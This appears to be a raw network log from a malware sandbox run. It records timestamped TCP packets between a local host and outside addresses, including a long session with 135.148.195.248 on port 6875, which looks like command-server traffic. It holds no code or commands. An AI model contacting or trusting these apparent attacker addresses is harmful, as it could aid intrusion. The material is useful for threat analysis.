                                                                                                                                            Oct 4, 2024 11:56:16.755830050 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.755845070 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.755858898 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.755876064 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.755892992 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.756217003 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.756263018 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.756277084 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.756304979 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.756376028 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.756390095 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.756405115 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.756418943 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.756419897 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.756449938 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.756535053 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.756550074 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.756560087 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.756566048 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.756597042 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.756700039 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.756715059 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.756728888 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.756742954 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.756757975 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.756767035 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.756792068 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.757359982 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.757407904 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.757411957 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.757422924 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.757467985 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.757483959 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.757561922 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.757575989 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.757590055 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.757605076 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.757606983 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.757628918 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.757749081 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.757764101 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.757777929 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.757797956 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.757813931 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.758565903 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.758619070 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.758636951 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.758667946 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.758868933 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.758883953 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.758897066 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.758923054 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.758924007 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.758940935 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.758955956 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.758970022 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.758970976 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.758987904 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.759000063 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.759002924 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.759031057 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.759077072 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.759094954 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.759109020 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.759119987 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.759124994 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.759160995 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.759246111 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.759851933 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.759874105 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.759886980 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.759900093 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.759902954 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.759915113 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.759928942 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.759936094 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.759951115 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.759958982 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.759964943 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.759978056 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.759979963 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.759995937 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.760009050 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.760010004 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.760025024 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.760037899 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.760040045 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.760051966 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.760065079 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.760068893 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.760085106 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.760097980 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.760128021 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.760221958 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.760236025 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.760250092 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.760262966 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.760276079 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.760277033 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.760293007 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.760307074 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.760307074 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.760323048 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.760335922 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.760338068 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.760365009 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.760524988 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:16.760571003 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:16.899131060 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:17.256031990 CEST491736875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:17.260991096 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:17.440545082 CEST8049178178.237.33.50192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:17.440666914 CEST4917880192.168.2.22178.237.33.50
                                                                                                                                            Oct 4, 2024 11:56:21.492070913 CEST8049179192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:21.492156982 CEST4917980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:23.614764929 CEST4917980192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:23.614801884 CEST49175443192.168.2.22213.183.76.22
                                                                                                                                            Oct 4, 2024 11:56:23.884908915 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:23.889956951 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:23.889997005 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:23.890052080 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:23.890053034 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:23.895025015 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:23.895092964 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:23.895127058 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:23.895155907 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:23.895183086 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:23.895186901 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:23.895216942 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:23.895242929 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:23.900048971 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:23.900098085 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:23.900110006 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:23.900125980 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:23.900156021 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:23.900182009 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:23.900273085 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:23.900300026 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:23.900409937 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:23.905114889 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:23.905275106 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:23.905304909 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:23.907088041 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:23.912288904 CEST687549177135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:23.912354946 CEST491776875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:28.157028913 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:28.157052994 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.157115936 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:28.158435106 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:28.158451080 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.619868994 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.619944096 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:28.623811960 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:28.623820066 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.624253988 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.669915915 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:28.715401888 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.767920017 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.768137932 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.768199921 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:28.768208027 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.768315077 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.768409967 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.768435001 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:28.768440962 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.768481016 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:28.768533945 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.768697977 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.768748045 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:28.768752098 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.769119978 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.769167900 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:28.769171953 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.778701067 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.778770924 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:28.778784037 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.855922937 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.856004953 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.856021881 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:28.856060982 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.856097937 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:28.856117964 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.856142998 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:28.857656002 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.857676983 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.857711077 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:28.857716084 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.857738018 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:28.857743979 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.857775927 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.857799053 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:28.857805014 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.857912064 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:28.942078114 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.942169905 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.942279100 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:28.942279100 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:28.942337990 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.943603992 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.943667889 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:28.943681002 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.943713903 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.943758011 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:28.945338011 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.945400000 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:28.945404053 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.945436954 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.945465088 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:28.993316889 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.993407011 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.993424892 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:28.993460894 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.993506908 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.029643059 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.029710054 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.029711962 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.029742956 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.029778957 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.030424118 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.030481100 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.030487061 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.030508041 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.030605078 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.030610085 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.031434059 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.031490088 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.031493902 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.031507015 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.031553030 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.031558037 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.037556887 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.037621021 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.037631989 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.037667990 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.037729979 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.038063049 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.038129091 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.038151026 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.038156986 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.038280010 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.080113888 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.080173016 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.080183983 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.080215931 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.080281973 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.116483927 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.116565943 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.116600990 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.116607904 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.116628885 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.117082119 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.117136955 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.117141008 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.117161989 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.117213964 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.117218018 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.117630959 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.117695093 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.117697001 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.117729902 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.117763996 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.118197918 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.118262053 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.118272066 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.118297100 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.118338108 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.118820906 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.118884087 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.118884087 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.118916035 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.118944883 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.119299889 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.119371891 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.119412899 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.119417906 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.119472980 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.119924068 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.119990110 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.119997025 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.120019913 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.120043993 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.203259945 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.203301907 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.203342915 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.203358889 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.203408957 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.203425884 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.203560114 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.203579903 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.203613997 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.203656912 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.203675985 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.203701973 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.204423904 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.204459906 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.204479933 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.204483986 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.204504967 CEST49180443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:29.205131054 CEST44349180185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:29.205161095 CEST44349180185.199.111.133192.168.2.22
